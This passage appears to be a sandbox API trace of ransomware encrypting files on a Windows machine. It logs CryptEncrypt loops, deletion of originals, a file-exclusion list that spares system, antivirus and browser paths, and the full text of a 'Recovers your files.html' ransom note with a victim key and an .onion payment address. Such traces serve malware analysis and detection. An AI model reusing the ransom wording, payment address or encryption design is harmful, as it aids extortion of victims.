pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.448] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.448] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.448] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.448] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.448] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.448] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.448] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.448] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.448] WriteFile (in: hFile=0x588, lpBuffer=0x2974e30*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0161.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", dwFileAttributes=0x20) returned 0 [0161.449] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 1 [0161.449] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0 [0161.449] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0161.449] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 1 [0161.449] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\.xXEA04.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\.xxea04.tmp")) returned 0xea04 [0161.450] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\.xXEA04.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\.xxea04.tmp"), dwFlags=0x1) returned 0 [0161.450] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\.xXEA04.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\.xxea04.tmp")) returned 1 [0161.450] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0161.450] wcslen (_String="OK") returned 0x2 [0161.450] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.450] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.450] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0161.450] CryptDestroyHash (hHash=0x9ad678) returned 1 [0161.450] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0161.450] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.450] GetLastError () returned 0x12 [0161.450] FindClose (in: hFindFile=0x9ad138 | out: hFindFile=0x9ad138) returned 1 [0161.450] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.451] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.451] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.452] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.452] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.exe") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.dll") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.lnk") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.bat") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.ini") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.msi") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*.scf") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*pagefile.sys*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*AppData*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\winrar\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\java\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\windows\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\ESET\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\AVG\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*Atheros*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*Realtek*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*bootmgr*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*boot*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*boot*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*IO.SYS*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*ntldr*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*chrome*") returned 0 [0161.452] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*opera*") returned 0 [0161.453] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", pszSpec="*firefox*") returned 0 [0161.453] wcslen (_String="\\\\?\\") returned 0x4 [0161.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad1b8 [0161.454] wcscmp (_String1=".", _String2=".") returned 0 [0161.454] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.454] wcscmp (_String1="..", _String2=".") returned 1 [0161.454] wcscmp (_String1="..", _String2="..") returned 0 [0161.454] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.454] PathMatchSpecW (pszFile="LICLUA.EXE", pszSpec="*NMCRYPT") returned 0 [0161.454] PathMatchSpecW (pszFile="LICLUA.EXE", pszSpec="*Recovers your files.html") returned 0 [0161.454] PathMatchSpecW (pszFile="LICLUA.EXE", pszSpec="*.exe") returned 1 [0161.454] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0161.454] wcscmp (_String1="Office Setup Controller", _String2=".") returned 1 [0161.455] wcscmp (_String1="Office Setup Controller", _String2="..") returned 1 [0161.455] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0161.455] GetLastError () returned 0x12 [0161.455] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0161.455] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.455] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.455] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.455] wcslen (_String="\\\\?\\") returned 0x4 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.exe") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.dll") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.lnk") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.bat") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.ini") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.msi") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*.scf") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*pagefile.sys*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*AppData*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\winrar\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\java\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\windows\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\ESET\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\AVG\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.455] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*Atheros*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*Realtek*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*bootmgr*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*boot*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*boot*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*IO.SYS*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*ntldr*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*chrome*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*opera*") returned 0 [0161.456] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", pszSpec="*firefox*") returned 0 [0161.456] wcslen (_String="\\\\?\\") returned 0x4 [0161.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1f8 [0162.101] wcscmp (_String1=".", _String2=".") returned 0 [0162.101] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0162.101] wcscmp (_String1="..", _String2=".") returned 1 [0162.101] wcscmp (_String1="..", _String2="..") returned 0 [0162.102] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0162.102] PathMatchSpecW (pszFile="pidgenx.dll", pszSpec="*NMCRYPT") returned 0 [0162.102] PathMatchSpecW (pszFile="pidgenx.dll", pszSpec="*Recovers your files.html") returned 0 [0162.102] PathMatchSpecW (pszFile="pidgenx.dll", pszSpec="*.exe") returned 0 [0162.102] PathMatchSpecW (pszFile="pidgenx.dll", pszSpec="*.dll") returned 1 [0162.102] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*NMCRYPT") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*Recovers your files.html") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.exe") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.dll") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.lnk") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.bat") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.ini") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.msi") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*.scf") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*pagefile.sys*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*NTUSER.DAT*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*AppData*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\winrar\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\java\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\TeamViewer\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\windows\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\ESET\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\AVG\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\AVIRA\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*\\AVAST Software\\*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*Atheros*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*Realtek*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*bootmgr*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*boot*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*boot*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*CONFIG.SYS*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*IO.SYS*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*MSDOS.SYS*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*NTDETECT.COM*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*ntldr*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*chrome*") returned 0 [0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*opera*") returned 0 